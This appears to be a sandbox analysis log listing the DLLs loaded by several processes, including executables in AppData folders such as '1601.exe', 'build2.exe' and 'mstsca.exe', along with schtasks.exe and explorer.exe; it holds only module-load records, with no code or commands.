Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\455F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryuserer.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
